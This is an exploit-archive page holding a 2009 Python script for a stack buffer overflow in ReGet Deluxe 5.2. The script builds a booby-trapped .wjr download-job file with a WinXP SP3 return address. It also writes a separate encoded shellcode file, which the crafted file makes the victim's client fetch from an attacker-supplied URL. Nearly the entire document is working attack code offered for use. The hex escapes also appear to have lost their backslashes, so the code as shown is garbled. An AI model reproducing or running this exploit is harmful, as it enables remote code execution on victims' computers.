ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit
# Published : 2009-12-25
# Author : Encrypt3d.M!nd
# Previous Title : Mini-Stream 3.0.1.1 Buffer Overflow Exploit (Meta)
# Next Title : CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3
import sys

print ""
print "    ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit"
print "    By: Encrypt3d.M!nd                                 "
print "    http://m1nd3d.wordpress.com/                       "
print "      For Details visit my blog                        "
print ""


try:

 header = (
"x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30x22x20x65x6Ex63x6F"
"x64x69x6Ex67x3Dx22x55x54x46x2Dx38x22x20x3Fx3Ex0Dx0Ax3Cx21x2Dx2Dx20x47x65"
"x6Ex65x72x61x74x65x64x20x62x79x20x52x65x47x65x74x20x44x65x6Cx75x78x65x20"
"x35x2Ex32x20x28x62x75x69x6Cx64x20x33x33x30x29x20x2Dx2Dx3Ex0Dx0Ax3Cx52x65"
"x47x65x74x4Ax72x0Dx0Ax09x4Cx61x73x74x49x64x3Dx22x31x22x0Dx0Ax09x50x72x65"
"x64x65x66x69x6Ex65x64x43x61x74x65x67x6Fx72x69x65x73x3Dx22x31x22x0Dx0Ax09"
"x54x72x61x66x66x69x63x53x75x73x70x65x6Ex64x65x64x3Dx22x31x22x0Dx0Ax09x54"
"x72x61x66x66x69x63x43x6Fx6Fx70x65x72x61x74x69x76x65x3Dx22x32x22x0Dx0Ax09"
"x4Dx61x78x53x65x63x74x53x75x73x70x65x6Ex64x65x64x3Dx22x31x22x0Dx0Ax09x4D"
"x61x78x53x65x63x74x43x6Fx6Fx70x65x72x61x74x69x76x65x3Dx22x31x22x0Dx0Ax09"
"x4Dx61x78x53x65x63x74x55x6Ex6Cx69x6Dx69x74x65x64x3Dx22x33x22x0Dx0Ax09x53"
"x61x76x65x54x6Fx3Dx22x43x3Ax5Cx44x6Fx63x75x6Dx65x6Ex74x73x20x61x6Ex64x20"
"x53x65x74x74x69x6Ex67x73x5Cx75x6Ex6Bx6Ex6Fx77x6Ex5Cx4Dx79x20x44x6Fx63x75"
"x6Dx65x6Ex74x73x5Cx4Dx79x20x44x6Fx77x6Ex6Cx6Fx61x64x73x22x0Dx0Ax09x4Dx61"
"x78x45x72x72x6Fx72x43x6Fx75x6Ex74x3Dx22x31x30x30x22x0Dx0Ax09x54x72x79x50"
"x61x75x73x65x3Dx22x35x22x0Dx0Ax09x54x69x6Dx65x4Fx75x74x3Dx22x39x30x22x0D"
"x0Ax09x4Dx69x6Ex53x65x63x74x69x6Fx6Ex53x69x7Ax65x3Dx22x31x30x30x30x30x22"
"x0Dx0Ax09x41x75x74x6Fx53x61x76x65x52x65x73x75x6Cx74x46x69x6Cx65x3Dx22x43"
"x3Ax5Cx50x72x6Fx67x72x61x6Dx20x46x69x6Cx65x73x5Cx52x65x47x65x74x20x53x6F"
"x66x74x77x61x72x65x5Cx52x65x47x65x74x20x44x65x6Cx75x78x65x5Cx73x65x61x72"
"x63x68x2Ex78x6Dx6Cx22x0Dx0Ax09x3Ex0Dx0Ax09x3Cx51x75x65x75x65x3Ex0Dx0Ax09"
"x09x3Cx44x6Fx77x6Ex6Cx6Fx61x64x0Dx0Ax09x09x09x49x64x3Dx22x31x22x0Dx0Ax09"
"x09x09x46x69x6Cx65x4Ex61x6Dx65x3Dx22x43x3Ax5Cx44x6Fx63x75x6Dx65x6Ex74x73"
"x20x61x6Ex64x20x53x65x74x74x69x6Ex67x73x5Cx75x6Ex6Bx6Ex6Fx77x6Ex5Cx4Dx79"
"x20x44x6Fx63x75x6Dx65x6Ex74x73x5Cx4Dx79x20x44x6Fx77x6Ex6Cx6Fx61x64x73x5C"
"x61x2Ex65x78x65x22x0Dx0Ax09x09x09x53x74x61x74x65x3Dx22x33x22x0Dx0Ax09x09"
"x09x44x6Fx6Ex74x55x73x65x43x61x74x65x67x6Fx72x79x53x6Fx72x74x69x6Ex67x3D"
"x22x30x22x0Dx0Ax09x09x09x53x74x61x72x74x44x6Cx54x69x6Dx65x3Dx22x30x22x0D"
"x0Ax09x09x09x43x72x65x61x74x69x6Fx6Ex54x69x6Dx65x3Dx22x32x35x2Ex31x32x2E"
"x32x30x30x39x20x31x34x3Ax35x38x3Ax30x32x22x0Dx0Ax09x09x09x4Cx61x73x74x53"
"x74x61x72x74x54x69x6Dx65x3Dx22x30x22x0Dx0Ax09x09x09x55x72x6Cx3Dx22x68x74"
"x74x70x3Ax2Fx2F"+sys.argv[1]+"x22x0Dx0Ax09"
"x09x09x44x6Fx77x6Ex6Cx6Fx61x64x43x61x74x65x67x6Fx72x79x3Dx22x2Dx31x22x0D"
"x0Ax09x09x09x53x61x76x65x54x6Fx3Dx22")

 buff = "x41" * 268
 buff+= "x5Fx4Dx48x7E" # call edi - winxp sp3 (friendly chars)
 buff+= "x41" * 1000

 foot = (
"x22x0Dx0Ax09x09x09x41x75x74x6Fx53x74x61x72x74x43x72x65x61x74x65x3Dx22x31"
"x22x0Dx0Ax09x09x20x2Fx3Ex0Dx0Ax09x3Cx2Fx51x75x65x75x65x3Ex0Dx0Ax3Cx2Fx52"
"x65x47x65x74x4Ax72x3Ex0Dx0A")

 evil = "x90" * 100
 evil+= (
"x89xe6xd9xc7xd9x76xf4x59x49x49x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x4cx49x43x30x43x30x45x50x45x30x4bx39"
"x4ax45x46x51x4ex32x51x74x4cx4bx46x32x44x70x4c"
"x4bx42x72x44x4cx4ex6bx43x62x42x34x4ex6bx51x62"
"x47x58x44x4fx48x37x51x5ax45x76x46x51x49x6fx45"
"x61x4fx30x4ex4cx47x4cx51x71x51x6cx45x52x46x4c"
"x47x50x4fx31x4ax6fx44x4dx45x51x4fx37x4dx32x48"
"x70x42x72x46x37x4cx4bx46x32x42x30x4ex6bx50x42"
"x45x6cx47x71x4ex30x4ex6bx51x50x51x68x4cx45x4f"
"x30x44x34x51x5ax46x61x48x50x42x70x4cx4bx50x48"
"x42x38x4cx4bx50x58x51x30x46x61x4ex33x4dx33x47"
"x4cx43x79x4cx4bx50x34x4cx4bx46x61x4ax76x46x51"
"x49x6fx44x71x49x50x4cx6cx4bx71x4ax6fx46x6dx47"
"x71x4fx37x46x58x4bx50x43x45x4ax54x43x33x43x4d"
"x4bx48x47x4bx43x4dx51x34x43x45x4bx52x42x78x4c"
"x4bx46x38x45x74x46x61x4ax73x45x36x4cx4bx46x6c"
"x50x4bx4ex6bx43x68x45x4cx46x61x4ex33x4cx4bx46"
"x64x4ex6bx43x31x4ex30x4ex69x51x54x46x44x51x34"
"x51x4bx51x4bx43x51x51x49x51x4ax50x51x49x6fx49"
"x70x51x48x51x4fx43x6ax4cx4bx42x32x4ax4bx4fx76"
"x43x6dx50x6ax47x71x4ex6dx4dx55x4ex59x47x70x43"
"x30x45x50x46x30x42x48x44x71x4ex6bx42x4fx4fx77"
"x4bx4fx4ax75x4dx6bx4dx30x45x4dx46x4ax44x4ax42"
"x48x49x36x4cx55x4dx6dx4dx4dx49x6fx4ex35x45x6c"
"x45x56x51x6cx44x4ax4bx30x4bx4bx4bx50x51x65x44"
"x45x4dx6bx50x47x44x53x42x52x50x6fx42x4ax43x30"
"x46x33x4bx4fx4ax75x42x43x50x61x50x6cx42x43x43"
"x30x41x41")

 evil+="x41" * 70000


 wjr_file=open('devil.wjr','w')
 wjr_file.write(header+buff+foot)
 wjr_file.close()
 print "[+] 'devil.wjr' Created Successfully"

 devil_file=open('shellcode','w')
 devil_file.write(evil)
 devil_file.close()
 print "[+] 'shellcode' Created Successfully"

except:
  print "###################################################"
  print " Usage: exploit.py [payload]                       "
  print "     [payload] = url to shellcode without(http://) "
  print "    Example:                                       "
  print "      exploit.py www.site.com/shellcode            "